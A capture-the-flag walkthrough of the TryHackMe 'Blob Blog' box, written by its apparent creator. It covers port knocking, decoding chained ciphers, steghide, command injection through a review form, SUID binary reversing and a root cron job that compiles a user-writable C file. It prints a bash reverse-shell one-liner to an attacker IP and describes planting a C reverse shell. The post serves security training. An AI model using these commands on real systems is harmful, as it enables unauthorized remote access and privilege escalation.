bobloblaw321

TryHackMe - Blob Blog

Updated: Sep 6, 2020

Welcome to my walkthrough of the first machine I've created! This box is something I'd consider medium/hard on THM:

 

Scanning & Enumeration

As always, we begin with enumerating the machine ports and services. I use my personal script to obtain the open ports with Threader3000 and then scan the open ones with nmap:



nmap -T4 -Pn -p22,80 -A 10.10.125.198
 

Enumerating Services


Port 22 - ssh

Even though ssh is open, I leave that alone for now, as I probably won't be able to exploit it unless I find some credentials.


Port 80 - http

A web server, aka a CTF gold mine, let's check that out:


When we visit the page, we just get a default webpage, so nothing interesting. Directory busting on this website, I don't get any results. If we look a little deeper though (at the source code), we find something interesting:


That looks like some encoded information. Bringing that into CyberChef and base64-decoding it, we get this:

Huh, looks like it's encoded again. This time in a language called BrainF**k. So let's go try to decode that as well:
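
As an added illustration (not part of the original post), here is the two-stage decode in Python: base64 first, then a small Brainfuck interpreter. The sample blob is constructed from a placeholder message, not the box's real hint.

```python
import base64

def run_brainfuck(code, max_steps=1_000_000):
    """Minimal Brainfuck interpreter: 8-bit wrapping cells, no input, returns the output text."""
    jump, stack = {}, []  # precompute matching brackets so loops jump directly
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError("unbalanced brackets in Brainfuck program")
    tape, ptr, pc, out = [0] * 30000, 0, 0, []
    while pc < len(code) and max_steps > 0:
        c = code[pc]
        if c == ">":
            ptr += 1
        elif c == "<":
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif c == "[" and tape[ptr] == 0:
            pc = jump[pc]  # skip the loop body
        elif c == "]" and tape[ptr] != 0:
            pc = jump[pc]  # back to the loop start
        pc += 1
        max_steps -= 1
    return "".join(out)

def decode_hint(blob):
    """The page's chain: base64 text -> Brainfuck program -> readable message."""
    return run_brainfuck(base64.b64decode(blob).decode("ascii"))

def to_brainfuck(text):
    """Encoder used only to build the sample: per character clear the cell, add ord, print."""
    return "".join("[-]" + "+" * ord(ch) + "." for ch in text)

# Constructed sample blob (placeholder text, not the real hint from the box).
SAMPLE_BLOB = base64.b64encode(to_brainfuck("knock 1 2 3").encode("ascii")).decode("ascii")
```

Paste the page-source blob in place of SAMPLE_BLOB to reproduce the CyberChef step offline.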

The decoded message talks about knocking and gives us 3 numbers. It's most likely talking about port knocking. Trying that out with this command:

knock 10.10.125.198 {ports, space separated}

And then scanning the box again:

We get a bunch of open ports now! Let's enumerate again.

Ports 22 & 80 we'll skip since we already did that.

Port 21 - ftp

Checking if anonymous login is allowed on the ftp port, it's not, so we either have to move on or search for some credentials somewhere. If you actually enumerate port 80 more, you'll find some extra information in the source code on the bottom of the page:

Luckily, whoever left this there was nice enough to tell us the password is encoded. We can also infer that the username to log in wherever these credentials are used is 'Bob'.


Going to decode that password we get:


Now trying these credentials on the ftp server we find ourselves successful:

 

Searching for Credentials

The first thing I try to do when I get a picture is extract any information that may be hidden in it:

Unfortunately it seems we need a password. We probably have to do some more enumeration to find it. Heading out to the other ports that were open:


Port 445 - http

It is actually an http server here, not SMB, despite being on port 445. Enumerating this with dirsearch, I found something, but I'll leave that for you to explore. So instead, looking at the source code again:

We're given a password. Using that password on the picture:


steghide extract -sf cool.jpeg

Now we have what looks like a Vigenère cipher and what might be a directory. Trying that directory out on the different web servers, we get a hit on 445:

In Bob's safe stuff, it looks like we're given something else. Since we guessed from before that it's a Vigenère cipher, let's try this out as the key for the cipher:

I use the website cryptii for this; decoding the cipher with the key we found gives us Bob's credentials! Now we need to figure out where to use them...

 

Vulnerable WebApp


Port 8080 - http

The last place we have yet to look is port 8080. When we visit it, it's yet another default Apache web page. But this time, enumerating the site with dirsearch gives us some results!



python3 /opt/dirsearch/dirsearch.py -u 10.10.125.198:8080 -e '*' -r

Visiting any of these, we are redirected to the login page. Using the credentials we decoded from the ftp picture, we try to log in:


And we are able!

Enumerating this I don't find anything too interesting, except, maybe, the review page which shows someone crushing pretty hard on the maker of this blog/box:

Seeing that we have an input bar, I always check if I have any code execution. By populating the review field with a simple:


ls

And then visiting the review webpage:

And we do have code execution! Now let's see if we're able to get a reverse shell. You can find a reverse shell one-liner in a lot of places; I like to use Pentest Monkey's:


bash -i >& /dev/tcp/10.9.1.161/4444 0>&1

Once we visit the review page we successfully have a reverse shell and access to the machine! The first thing I do when getting a limited shell is upgrade it to a full shell using this:


python -c "import pty;pty.spawn('/bin/bash')"
ctrl+z
stty raw -echo
fg
fg
export TERM=xterm-256color
 

Privesc to User

Now that we have access as www-data, it doesn't look like we actually have access to anything useful, or can access the user's home directory. So I look around for something that may lead to privesc. The first thing I always like to look at is sudo privileges. Unfortunately, we had none here. The next thing I like to look for is SUID binaries. I do that with this command:


find / -perm -4000 2>/dev/null

Looking at that list, most of that looks pretty normal, except for `blogFeeback`, that's definitely out of place. Running it to see what it does for us:

It doesn't seem like it does much. So let's try some reverse engineering! I like doing RE with Ghidra. To do that, I have to get the binary over to my Kali machine:

I do that with a Python web server on the target machine and retrieve it with wget on my attacker machine. Once this is done, I use Ghidra to inspect the binary:

It looks like the program spawns a shell if certain conditions are met. Looking closely at the code, it loops from 1 to 7 and, on each iteration, compares the argument at position 7 minus the loop counter with an expected value. If the argument doesn't match, the program exits. On each iteration `iVar1` moves on to the next parameter being checked. This means it's looking for 6 parameters, supplied in reverse order, before it reaches the shell spawn. So trying this on the binary:

We get user! And we can now read the user flag:

 

Privesc to Root

While escalating to user, you should have noticed a weird message being printed out periodically:

That's a scheduled process, since it's happening every so often. I can't find anything that prints it in the normal crontab, so I bring pspy over instead and wait for a message to print to see where it is coming from:


Getting pspy


I made it executable and then ran it and eventually saw this:


chmod +x pspy64
./pspy64
/bin/sh -c gcc /home/bobloblaw/Documents/.boring_file.c -o /home/bobloblaw/Documents/.also_boring/.still_boring && chmod +x /home/bobloblaw/Documents/.also_boring/.still_boring && /home/bobloblaw/Documents/.also_boring/.still_boring | tee /dev/pts/0 /dev/pts/1 /dev/pts/2 && rm /home/bobloblaw/.also_boring/.still_boring

That's very hard to read, but what the process seems to be doing is compiling a C file, making the result executable, running it, and then deleting it. The key here, though, is that it's being run as root! So we have found our escalation path. If we have access to that C file and can write to it, we can put a reverse shell in it. Let's check if that's the case:

I was able to find the file, and looking at the permissions, user `bobloblaw` indeed has write permissions! Now I scoured the internet for a C reverse shell and found one. I'll leave that to you and your googling skills to find your own C reverse shell :)
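
The misconfiguration here is root executing a file that a regular user can write. As an added example (not code from the box or from the original post), here is a small Python audit that takes such a command line, pulls out the absolute paths it touches, and reports any that an untrusted user could change. The command string and the staged directory tree are constructed to mirror the layout above, and the staged copy treats the current user as the trusted owner in place of root.

```python
import os
import shlex
import stat
import tempfile

ROOT_CMD = (  # constructed sample: the compile-and-run part of the root job pspy showed
    "gcc /home/bobloblaw/Documents/.boring_file.c "
    "-o /home/bobloblaw/Documents/.also_boring/.still_boring && "
    "chmod +x /home/bobloblaw/Documents/.also_boring/.still_boring && "
    "/home/bobloblaw/Documents/.also_boring/.still_boring"
)

def referenced_paths(cmdline):
    """Absolute paths named anywhere on a shell command line, deduplicated and sorted."""
    return sorted({tok for tok in shlex.split(cmdline) if tok.startswith("/")})

def writable_by_untrusted(path, trusted_uids):
    """Conservative: risky if an untrusted uid owns the path or group/other write bits
    are set. A path that does not exist yet is judged by its parent directory."""
    probe = path if os.path.lexists(path) else os.path.dirname(path)
    st = os.stat(probe)
    return st.st_uid not in trusted_uids or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_root_command(cmdline, fs_root="", trusted_uids=frozenset({0})):
    """Paths in a root-run command that a non-trusted user could tamper with."""
    risky = []
    for p in referenced_paths(cmdline):
        real = fs_root + p  # fs_root lets the audit run on a staged copy of the tree
        if not os.path.isdir(os.path.dirname(real)):
            continue  # nothing staged at this location, so nothing to judge
        if any(writable_by_untrusted(x, trusted_uids) for x in (real, os.path.dirname(real))):
            risky.append(p)
    return risky

def stage_demo_tree():
    """Throwaway copy of the box's layout: world-writable .c source, owner-only dirs."""
    root = tempfile.mkdtemp()
    docs = os.path.join(root, "home/bobloblaw/Documents")
    os.makedirs(os.path.join(docs, ".also_boring"))
    for d in (docs, os.path.join(docs, ".also_boring")):
        os.chmod(d, 0o755)
    src = os.path.join(docs, ".boring_file.c")
    with open(src, "w") as f:
        f.write("int main(void) { return 0; }\n")
    os.chmod(src, 0o666)
    return root

def demo_audit():
    """Audit the staged tree, treating the current user as the trusted owner."""
    return audit_root_command(ROOT_CMD, stage_demo_tree(), {os.getuid()})
```

Running audit_root_command with the default trusted uid against a live crontab entry flags exactly the file this box hinges on; a sane setup keeps root-compiled sources under a root-owned, non-writable directory.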


Instead of copying line by line, I just removed the file on the target machine and downloaded this one in its place and used the same name:

Setting up a listener and waiting a bit we get our root shell!

 

Bonus

There were a good amount of rabbit holes on this box, so good job if you were able to complete it without falling too deeply down them! There is also an alternate way to get directly to user without needing to privesc from www-data, but I'd like to see if anyone can figure that one out. If you do, hit me up on Discord and I'll give you a cookie or something.


I've created a blog post on how to create a vulnerable machine as well, detailing how I made this one. For those of you interested in creating one of these machines, be sure to check that out! It's titled 'The making of a Vulnerable Machine (Blob Blog)'.


That's all for now. If there are any questions about anything that was done, feel free to reach me either on the THM website or their Discord server under the name bobloblaw!


Thanks for reading and doing my box, I sincerely hope you enjoyed it!
